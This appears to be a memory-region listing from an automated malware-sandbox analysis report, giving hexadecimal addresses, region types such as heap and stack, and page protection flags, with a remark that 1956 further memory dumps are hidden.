1D6669E6000
|
heap
|
page read and write
|
||
|
3170000
|
unkown
|
page read and write
|
||
|
9DED000
|
stack
|
page read and write
|
||
|
A364000
|
unkown
|
page read and write
|
||
|
7FF5ED39B000
|
unkown
|
page readonly
|
||
|
7FF5EDA53000
|
unkown
|
page readonly
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
AAF6000
|
unkown
|
page read and write
|
||
|
BDC0000
|
unkown
|
page readonly
|
||
|
7FF5ED9BE000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7FF5ED412000
|
unkown
|
page readonly
|
||
|
29F039F0000
|
heap
|
page read and write
|
||
|
1DC4FFD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED9B8000
|
unkown
|
page readonly
|
||
|
8A6E000
|
stack
|
page read and write
|
||
|
3335000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
F524000
|
unkown
|
page read and write
|
||
|
97A9000
|
unkown
|
page read and write
|
||
|
54286FE000
|
stack
|
page read and write
|
||
|
7FF5ED3EA000
|
unkown
|
page readonly
|
||
|
7FF5ED7F1000
|
unkown
|
page readonly
|
||
|
7FF5ED4C2000
|
unkown
|
page readonly
|
||
|
7FFD9B6E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED59E000
|
unkown
|
page readonly
|
||
|
9815000
|
unkown
|
page read and write
|
||
|
7DDC000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED586000
|
unkown
|
page readonly
|
||
|
7FF5ED4E8000
|
unkown
|
page readonly
|
||
|
78A0000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1505000
|
heap
|
page read and write
|
||
|
7FF5ED818000
|
unkown
|
page readonly
|
||
|
3364000
|
heap
|
page read and write
|
||
|
7B80000
|
unkown
|
page read and write
|
||
|
986F000
|
unkown
|
page read and write
|
||
|
7FF5ED4BB000
|
unkown
|
page readonly
|
||
|
91B9000
|
stack
|
page read and write
|
||
|
C92D000
|
unkown
|
page read and write
|
||
|
1D667683000
|
heap
|
page read and write
|
||
|
7FF5ED933000
|
unkown
|
page readonly
|
||
|
7FF5ED980000
|
unkown
|
page readonly
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
7FF5ED1B6000
|
unkown
|
page readonly
|
||
|
1DC3E08D000
|
heap
|
page read and write
|
||
|
7FF5ED349000
|
unkown
|
page readonly
|
||
|
7FF5ED1D8000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
F464000
|
unkown
|
page read and write
|
||
|
97D4000
|
unkown
|
page read and write
|
||
|
7FF5ED265000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
A19F000
|
stack
|
page read and write
|
||
|
1505000
|
heap
|
page read and write
|
||
|
1DC3E089000
|
heap
|
page read and write
|
||
|
A37B000
|
unkown
|
page read and write
|
||
|
67AC000
|
stack
|
page read and write
|
||
|
7FF5ED743000
|
unkown
|
page readonly
|
||
|
7FF5ED803000
|
unkown
|
page readonly
|
||
|
33D1000
|
unkown
|
page read and write
|
||
|
C8E1000
|
unkown
|
page read and write
|
||
|
7FF5ED80C000
|
unkown
|
page readonly
|
||
|
1D6672BA000
|
heap
|
page read and write
|
||
|
7FF5ED9BE000
|
unkown
|
page readonly
|
||
|
29F03A37000
|
heap
|
page read and write
|
||
|
9792000
|
unkown
|
page read and write
|
||
|
7FF5ED3EA000
|
unkown
|
page readonly
|
||
|
34E9000
|
stack
|
page read and write
|
||
|
818E000
|
stack
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
79D3000
|
unkown
|
page read and write
|
||
|
29F038C0000
|
heap
|
page read and write
|
||
|
7FF5ED743000
|
unkown
|
page readonly
|
||
|
6220000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7E11000
|
unkown
|
page read and write
|
||
|
7FF5ED1CB000
|
unkown
|
page readonly
|
||
|
97C000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C6F4000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
9871000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
B728000
|
stack
|
page read and write
|
||
|
FBE0000
|
unkown
|
page read and write
|
||
|
7D00000
|
unkown
|
page readonly
|
||
|
7FF5ED426000
|
unkown
|
page readonly
|
||
|
7FF5ED495000
|
unkown
|
page readonly
|
||
|
1D6672C6000
|
heap
|
page read and write
|
||
|
7FF5ED9CC000
|
unkown
|
page readonly
|
||
|
57A9000
|
unclassified section
|
page read and write
|
||
|
96DF000
|
unkown
|
page read and write
|
||
|
7FF5ED93B000
|
unkown
|
page readonly
|
||
|
10DD9000
|
system
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
7884000
|
unkown
|
page read and write
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
797D000
|
unkown
|
page read and write
|
||
|
53AD000
|
direct allocation
|
page execute and read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
1D667665000
|
heap
|
page read and write
|
||
|
97AD000
|
unkown
|
page read and write
|
||
|
7FF5ED4B0000
|
unkown
|
page readonly
|
||
|
7FF5ED625000
|
unkown
|
page readonly
|
||
|
896B000
|
stack
|
page read and write
|
||
|
29F0BB8E000
|
trusted library allocation
|
page read and write
|
||
|
89A0000
|
unkown
|
page read and write
|
||
|
35C0000
|
heap
|
page read and write
|
||
|
F4EB000
|
unkown
|
page read and write
|
||
|
1D66735E000
|
heap
|
page read and write
|
||
|
8860000
|
unkown
|
page read and write
|
||
|
7CD0000
|
unkown
|
page read and write
|
||
|
7FF5ED714000
|
unkown
|
page readonly
|
||
|
7FF5ED77C000
|
unkown
|
page readonly
|
||
|
1510000
|
unkown
|
page readonly
|
||
|
1D667268000
|
heap
|
page read and write
|
||
|
7FF5ED42B000
|
unkown
|
page readonly
|
||
|
2B2F000
|
stack
|
page read and write
|
||
|
5209000
|
direct allocation
|
page execute and read and write
|
||
|
9550000
|
unkown
|
page readonly
|
||
|
8720000
|
unkown
|
page readonly
|
||
|
E61D000
|
stack
|
page read and write
|
||
|
7FF5ED4EF000
|
unkown
|
page readonly
|
||
|
FC01000
|
unkown
|
page read and write
|
||
|
4C34000
|
unkown
|
page read and write
|
||
|
9F9C000
|
stack
|
page read and write
|
||
|
7FF5ED9AE000
|
unkown
|
page readonly
|
||
|
5427DAE000
|
stack
|
page read and write
|
||
|
1D66732B000
|
heap
|
page read and write
|
||
|
1D6672D8000
|
heap
|
page read and write
|
||
|
3748000
|
unkown
|
page read and write
|
||
|
29F06563000
|
trusted library allocation
|
page read and write
|
||
|
6220000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED77E000
|
unkown
|
page readonly
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
7FF5ED9D9000
|
unkown
|
page readonly
|
||
|
7DF4F3050000
|
unkown
|
page readonly
|
||
|
682E000
|
stack
|
page read and write
|
||
|
8FB9000
|
stack
|
page read and write
|
||
|
C563000
|
unkown
|
page read and write
|
||
|
7FF5ED755000
|
unkown
|
page readonly
|
||
|
7FF5ED519000
|
unkown
|
page readonly
|
||
|
1DC3E08B000
|
heap
|
page read and write
|
||
|
AAF2000
|
unkown
|
page read and write
|
||
|
1DC580E5000
|
heap
|
page read and write
|
||
|
4BE3000
|
unkown
|
page read and write
|
||
|
7FF5ED821000
|
unkown
|
page readonly
|
||
|
1D6672BA000
|
heap
|
page read and write
|
||
|
A11F000
|
stack
|
page read and write
|
||
|
C030BFE000
|
stack
|
page read and write
|
||
|
1D666A1E000
|
heap
|
page read and write
|
||
|
7DF4F3031000
|
unkown
|
page execute read
|
||
|
7FF5ED956000
|
unkown
|
page readonly
|
||
|
1DC580E0000
|
heap
|
page read and write
|
||
|
7FF5ED50A000
|
unkown
|
page readonly
|
||
|
FC01000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1D667261000
|
heap
|
page read and write
|
||
|
1D6669D7000
|
heap
|
page read and write
|
||
|
5590000
|
unkown
|
page write copy
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1DC3E2F0000
|
heap
|
page read and write
|
||
|
785F000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
C54A000
|
unkown
|
page read and write
|
||
|
1D664CA8000
|
heap
|
page read and write
|
||
|
797D000
|
unkown
|
page read and write
|
||
|
9798000
|
unkown
|
page read and write
|
||
|
1D666A13000
|
heap
|
page read and write
|
||
|
4BE3000
|
unkown
|
page read and write
|
||
|
1DC400EA000
|
trusted library allocation
|
page read and write
|
||
|
A433000
|
unkown
|
page read and write
|
||
|
1DC582D0000
|
heap
|
page execute and read and write
|
||
|
7D40000
|
unkown
|
page read and write
|
||
|
7FF5ED670000
|
unkown
|
page readonly
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
A491000
|
unkown
|
page read and write
|
||
|
1D666A2F000
|
heap
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
37AC000
|
unkown
|
page read and write
|
||
|
7FF5ED9E1000
|
unkown
|
page readonly
|
||
|
B8AB000
|
stack
|
page read and write
|
||
|
8809000
|
unkown
|
page read and write
|
||
|
7FF5ED50A000
|
unkown
|
page readonly
|
||
|
786B000
|
unkown
|
page read and write
|
||
|
7FF5ED495000
|
unkown
|
page readonly
|
||
|
7FF5ED40D000
|
unkown
|
page readonly
|
||
|
C857000
|
unkown
|
page read and write
|
||
|
C6F2000
|
unkown
|
page read and write
|
||
|
F56B000
|
unkown
|
page read and write
|
||
|
3800000
|
unkown
|
page readonly
|
||
|
1D666A0B000
|
heap
|
page read and write
|
||
|
1D664C9E000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
1D6672D9000
|
heap
|
page read and write
|
||
|
542807E000
|
stack
|
page read and write
|
||
|
A49E000
|
unkown
|
page read and write
|
||
|
50E0000
|
direct allocation
|
page execute and read and write
|
||
|
7FF5D1CCD000
|
unkown
|
page readonly
|
||
|
1D66730B000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
7FF5ED93E000
|
unkown
|
page readonly
|
||
|
1D6669E3000
|
heap
|
page read and write
|
||
|
7FF5ED80C000
|
unkown
|
page readonly
|
||
|
7FFD9B796000
|
trusted library allocation
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
4B78000
|
unkown
|
page read and write
|
||
|
36F0000
|
unkown
|
page readonly
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
C6C9000
|
unkown
|
page read and write
|
||
|
7FF5ED449000
|
unkown
|
page readonly
|
||
|
36D5000
|
stack
|
page read and write
|
||
|
1D6669FA000
|
heap
|
page read and write
|
||
|
CA02000
|
unkown
|
page read and write
|
||
|
8B60000
|
unkown
|
page readonly
|
||
|
987F000
|
unkown
|
page read and write
|
||
|
A327000
|
unkown
|
page read and write
|
||
|
4BDC000
|
unkown
|
page read and write
|
||
|
7DF4F3061000
|
unkown
|
page execute read
|
||
|
1DC581A5000
|
heap
|
page read and write
|
||
|
1D6676A1000
|
heap
|
page read and write
|
||
|
1D664E85000
|
heap
|
page read and write
|
||
|
1D666590000
|
heap
|
page read and write
|
||
|
1DC40125000
|
trusted library allocation
|
page read and write
|
||
|
1D66769E000
|
heap
|
page read and write
|
||
|
1DC3E2F8000
|
heap
|
page read and write
|
||
|
C811000
|
unkown
|
page read and write
|
||
|
7FF5ED39E000
|
unkown
|
page readonly
|
||
|
7FF5ED3D0000
|
unkown
|
page readonly
|
||
|
1DC3E2E0000
|
heap
|
page readonly
|
||
|
C561000
|
unkown
|
page read and write
|
||
|
A323000
|
unkown
|
page read and write
|
||
|
7FF5ED279000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1095000
|
stack
|
page read and write
|
||
|
7FF5ED8F9000
|
unkown
|
page readonly
|
||
|
7FF5ED337000
|
unkown
|
page readonly
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
unkown
|
page read and write
|
||
|
694E000
|
stack
|
page read and write
|
||
|
62B1000
|
heap
|
page read and write
|
||
|
2EF8000
|
stack
|
page read and write
|
||
|
89A0000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
7FF5ED76D000
|
unkown
|
page readonly
|
||
|
4B93000
|
unkown
|
page read and write
|
||
|
7FF5ED867000
|
unkown
|
page readonly
|
||
|
FC05000
|
unkown
|
page read and write
|
||
|
AB67000
|
unkown
|
page read and write
|
||
|
1D6669D4000
|
heap
|
page read and write
|
||
|
527E000
|
direct allocation
|
page execute and read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
37BD000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
B170000
|
unkown
|
page readonly
|
||
|
B82A000
|
stack
|
page read and write
|
||
|
C030AFE000
|
stack
|
page read and write
|
||
|
1D664B90000
|
heap
|
page read and write
|
||
|
8BE9000
|
stack
|
page read and write
|
||
|
7FF5ED87D000
|
unkown
|
page readonly
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
6750000
|
heap
|
page read and write
|
||
|
9798000
|
unkown
|
page read and write
|
||
|
C557000
|
unkown
|
page read and write
|
||
|
F579000
|
unkown
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
1D664CEB000
|
heap
|
page read and write
|
||
|
1D666A1E000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
987B000
|
unkown
|
page read and write
|
||
|
7FF5ED3D6000
|
unkown
|
page readonly
|
||
|
7FF5ED5CE000
|
unkown
|
page readonly
|
||
|
7FF5ED40D000
|
unkown
|
page readonly
|
||
|
1480000
|
heap
|
page read and write
|
||
|
7900000
|
unkown
|
page read and write
|
||
|
7FF5ED451000
|
unkown
|
page readonly
|
||
|
BDD0000
|
unkown
|
page readonly
|
||
|
8EC6000
|
unkown
|
page read and write
|
||
|
C41F000
|
stack
|
page read and write
|
||
|
7FF5ED9CA000
|
unkown
|
page readonly
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
79B1000
|
unkown
|
page read and write
|
||
|
3432000
|
heap
|
page read and write
|
||
|
29F096E6000
|
trusted library allocation
|
page read and write
|
||
|
1DC3E030000
|
heap
|
page read and write
|
||
|
379E000
|
unkown
|
page read and write
|
||
|
7865000
|
unkown
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5ED295000
|
unkown
|
page readonly
|
||
|
7FF5EDA08000
|
unkown
|
page readonly
|
||
|
1D66752A000
|
heap
|
page read and write
|
||
|
D8573FD000
|
stack
|
page read and write
|
||
|
7FF5ED864000
|
unkown
|
page readonly
|
||
|
1D666A5F000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
1D6672D9000
|
heap
|
page read and write
|
||
|
4D81000
|
heap
|
page read and write
|
||
|
3170000
|
unkown
|
page read and write
|
||
|
89E0000
|
unkown
|
page read and write
|
||
|
7FF5ED7C4000
|
unkown
|
page readonly
|
||
|
BD1D000
|
stack
|
page read and write
|
||
|
29F03B75000
|
heap
|
page read and write
|
||
|
7FF5ED847000
|
unkown
|
page readonly
|
||
|
1D664CDB000
|
heap
|
page read and write
|
||
|
7FF5ED9D9000
|
unkown
|
page readonly
|
||
|
B330000
|
system
|
page execute and read and write
|
||
|
AAF9000
|
unkown
|
page read and write
|
||
|
B150000
|
unkown
|
page read and write
|
||
|
7A34000
|
unkown
|
page read and write
|
||
|
9D64000
|
unkown
|
page read and write
|
||
|
1D666A24000
|
heap
|
page read and write
|
||
|
A502000
|
unkown
|
page read and write
|
||
|
C5A3000
|
unkown
|
page read and write
|
There are 1956 hidden memdumps, click here to show them.